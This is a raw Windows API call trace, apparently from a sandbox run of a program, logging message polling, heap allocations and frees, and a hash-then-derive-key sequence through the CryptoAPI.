PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0166.997] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.997] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0166.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.997] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0166.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.997] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0166.998] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.998] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.998] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0166.998] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.998] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.998] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0166.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.999] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0166.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0166.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.999] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0166.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0166.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 